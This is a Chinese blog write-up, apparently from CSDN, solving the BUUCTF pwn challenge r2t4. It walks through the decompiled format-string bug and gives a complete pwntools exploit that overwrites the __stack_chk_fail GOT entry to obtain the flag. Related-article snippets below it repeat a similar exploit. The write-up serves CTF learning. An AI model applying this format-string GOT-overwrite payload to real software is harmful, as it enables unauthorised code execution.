Java pwn_CTF-Pwn-[BJDCTF 2nd]r2t4

最新推荐文章于 2024-11-20 11:24:20 发布
最新推荐文章于 2024-11-20 11:24:20 发布
阅读量349 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: Java pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30698721/article/details/114721219
本文详细介绍了BJDCTF 2nd中Pwn类挑战r2t4的解决方案。通过ida64分析64位程序,发现格式化字符串漏洞。利用该漏洞,复写got表中的`__stack_chk_fail`地址,构造payload成功执行,从而获得flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CTF-Pwn-[BJDCTF 2nd]r2t4

博客说明

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

CTP平台

网址

https://buuoj.cn/challenges

题目

Pwn类,[BJDCTF 2nd]r2t4

bb1a749fa89c2ec36b247da1ebdec893.png

下载题目的文件

r2t4

思路

使用file命令查看,发现是64位的文件,使用ida64位打开

362374e5f5ad795b58a6573c971f6e18.png

进入主函数,使用F5反编译后得到伪代码,结果f5按不出来

ddba82959ca115f0b61d8b1035a441ed.png

int __cdecl main(int argc, const char **argv, const char **envp)

{

char buf; // [rsp+0h] [rbp-30h]

unsigned __int64 v5; // [rsp+28h] [rbp-8h]

v5 = __readfsqword(0x28u);

read(0, &buf, 0x38uLL);

printf(&buf, &buf);

return 0;

}

看一看这个main方法,感觉问题要出现在这个&buf身上,看一下整体关联

4a7a69ecc57f2f0430842edab4355cff.png

发现有个函数___stack_chk_fail,想到了格式化字符串漏洞

复写got表中的__stack_chk_fail地址

elf.got['__stack_chk_fail']

payload = "%64c%9$hn%1510c%10$hnAAA" + p64(__stack_chk_fail+2) + p64(__stack_chk_fail)

EXP

Python3

from pwn import *

context(arch='amd64',os='linux',word_size='64')

p = remote("node3.buuoj.cn",28242)

elf = ELF('./r2t4')

__stack_chk_fail = elf.got['__stack_chk_fail']

payload = b"%64c%9$hn%1510c%10$hnAAA" + p64(__stack_chk_fail+2) + p64(__stack_chk_fail)

p.sendline(payload)

p.interactive()

测试

cd然后我们测试运行

python3 r2t4.py

9fc8d617698a7807858caa561203c4f6.png

flag就找到了

感谢

BUUCTF

以及勤劳的自己

竞核
关注
Java pwn_虚拟PWN初探
weixin_39785858的博客
02-26 656
前言之前看到星盟Q群里面的消息,Freedom师傅在B站直播关于虚拟pwn入门的公开课,然后就去听了一波,感觉受益匪浅。之前一直以为虚拟pwn是超级复杂的东西,今年打比赛也遇到了好几次,一直无从下手。所以借着公开课学到的内容,复现了去年国赛虚拟pwn的那道题。这里写一篇博客记录下来,当作自己博客园的第一篇技术博文吧!主要是为了水周五的分享会漏洞分析就像Freedom师傅所说的,虚拟pwn的难点不是...
CTF-PWN-buuctf-pwn1_sctf_2016-CPP的字符串替换
serfend's blog
04-14 591
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1bSrSQZYWkBIWCXP5Lsq7sg?pwd=mpgo 提取码:mpgo 答案:flag{714a8f91-7e24-440c-8cc6-1f2d26adbcec} 总体思路 发现get_flag的位置 发现输入会被替换,构造exp 详细步骤 查看文件信息 查看题目发现是将用户输入的I替换为you,虽然输入的时候只允许输入32位,但是因为替换
攻防世界 Pwn 新手
yongbaoii的博客
10-04 3983
是一个总结与汇总,会把见到的思路,想法,wp都记录下来,并进行简单的分类 这里面的每个题我都没有去检查保护,太麻烦,新手区也没有需要绕过保护的,最简单的canary绕过也在进阶。 ps:我这里用的是python2.7。如果用python3的话代码会有一个致命的不同,看我的另外一篇博客 字符串编码解决python3 payload=‘a‘ +p64(1926)报错问题 01 get_shell 1、nc连接就行2、简单的exp from pwn import* r=remote("220.249.52.133
[BJDCTF 2nd] r2t4
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-24 897
题目下载地址:点此下载 查保护 此处存在格式化字符串漏洞 利用格式化字符串漏洞复写got表中的__stack_chk_fail地址,这个函数的作用是,当程序出现栈溢出的时候执行此函数,利用格式化字符串漏洞把这个函数的got表地址覆盖为后门函数 EXP: from pwn import * context(arch='amd64',os='linux',word_size='64') #p...
[BJDCTF 2nd]r2t4 [格式化字符串写GOT]
、moddemod
06-24 382
开启了Canary,但Canary失败的处理逻辑会进入到stack_chk_failed函数,stack_chk_failed函数是一个普通的延迟绑定函数,可以通过修改GOT表劫持这个函数。 exp from pwn import * context(log_level='debug') proc_name = './r2t4' p = process(proc_name) # p = remote('node3.buuoj.cn', 29985) elf = ELF(proc_name) __...
[BUUCTF]PWN——[BJDCTF 2nd]r2t4
mcmuyanga的博客
10-31 469
[BJDCTF 2nd]r2t4 附件 步骤 例行检查,64位,开启了canary和nx 64位ida载入,检索字符串的时候发现了后面函数,shell_addr=0x400626 main函数 可以溢出0x8字节,输出点存在格式化字符串漏洞 https://blog.csdn.net/weixin_44864859/article/details/105129673?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMac
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
xmljava系统源码-wctf:世界CTF黑客大赛交流社区
06-05
xml java系统源码 wctf 世界 CTF 黑客大赛交流社区 平台简介 WCTF 是基于多个开源框架,在它们的基础上搭建的社区论坛系统。 WCTF 是在Spring Framework基础上搭建的一个Java 社区论坛系统,以Spring MVC作为模型视图控制器,MyBatis为数据访问层, Apache Shiro为权限授权层,Redis作为二级缓存(对需要保证缓存一致性的数据进行缓存),Ehcahe作为一级缓存(对常用数据进行缓存)。 WCTF 内置了一系列基于Java语言的插件型工具和高效的异步任务调度工具, 包括:系统权限组件、核心工具组件、动态自动管理组件、多级缓存系统、集群支持等。 前端界面风格采用了国内流行的结构简单、性能优良、页面美观的Layui模块化前端框架。 采用分层设计、双重验证、提交数据安全编码、密码加密、访问验证、数据权限验证。 使用Maven做项目管理,提高项目的易开发性、扩展性。 WCTF 目前包括以下四大模块,系统管理(sys)模块、用户管理(user)模块、发贴管理(post)模块、新闻管理(news)模块、 动态管理(trend)模块。 系统
CTF多功能密码破解(需java环境)
02-09
CTF的小工具,实用方便,可支持多种古典密码,多种编码方式。
【转】CTF各种加密算法解密集成(java,支持Python)
11-08
利用java编写的加解密集成工具,集成了凯撒,base64,html等多种编解码,加解密,支持自定义python脚本。CTF比赛实战工具,简明易用。
CTF-Pwn-[BJDCTF 2nd]r2t4
归子莫的博客
05-06 1104
CTF-Pwn-[BJDCTF 2nd]r2t4 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]r2t4 下载题目的文件 r2t4 思路 使用file命令查看,发现是...
Java pwn_8月9日pwn学习
weixin_28775337的博客
02-26 287
ldd要看一个一个程序依赖的so文件可以用ldd命令,ldd命令后面必须跟上这个程序的绝对命令,一般先用which找到这个程序的绝对路径然后再用ldd命令查看。ldd结果分为三列第一列:程序依赖库的名字第二列:系统提供库的名字第三列:库加载的开始地址而在pwn中可以多次用ldd命令查看,来判断该程序是否提供了ASLR保护如图所示gdb插件peda在安装插件之前是需要安装gdb的,gdb的安装教程,...
Java安全-Java In CTF([红明谷CTF 2021]JavaWeb、[红明谷CTF 2021]JavaWeb)
Love&Share
05-05 2602
文章目录[RoarCTF 2019]Easy Java[红明谷CTF 2021]JavaWeb [RoarCTF 2019]Easy Java 存在文件下载,尝试去读 WEB-INF/web.xml,get 传参发现一直失败 在 burp 中改为 post 传参,可以正常下载文件 只要再去读 class 文件即可 成功下载 class 放到 idea 中,拿到 flag [红明谷CTF 2021]JavaWeb 题目提示 /login 目录,访问提示 /json 访问 /json 跳回到 /lo.
Java pwn_2020网鼎杯部分WEB&&PWN题解
weixin_29956903的博客
02-26 1145
今年网鼎杯不说啥了,没打进前130,我是菜B比不过各位师傅本文包括四场网鼎的部分WEB和PWN,本着菜鸡应该多练习的原则四场都看了看,除第一场外均为复现。青龙组PWN-boom1[*] '/home/Railgun/Desktop/2020wdb/pwn1'Arch: amd64-64-littleRELRO: Full RELROStack: Canary foundNX: ...
CTFJava 反编译&XXE&反序列化
qi_SJQ_的博客
03-02 6183
1.Java 常考点及出题思路: 考点技术:xxe,spel 表达式,反序列化,文件安全,最新框架插件漏洞等。 一般都会设法间接给出源码或相关配置提示文件,间接性源码或直接源码体现等形式,否则单纯黑盒难度比较大。 ctf web信息泄露总结: 参考:https://www.cnblogs.com/xishaonian/p/7628153.html 00x1 .ng 源码泄露 00x2 git 源码泄露 00x3 .DS_Store 文件泄漏 00x4 网站备份压缩文件 00x5 SVN 导致文件泄露 00.
CTF:记一次简单的Java反序列化题目
最新发布
weixin_44770698的博客
11-20 1130
CTF:记一次简单的Java反序列化题目
PwnCTF实用工具集: Ghidra扩展与脚本应用
资源摘要信息:"pwndra: Ghidra的与pwnCTF相关的实用程序的集合" 知识点详述: 1. Ghidra软件介绍: Ghidra是由美国国家安全局(NSA)开发的一套开源软件逆向工程(SRE)框架。该框架旨在帮助安全分析师理解和分析二...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值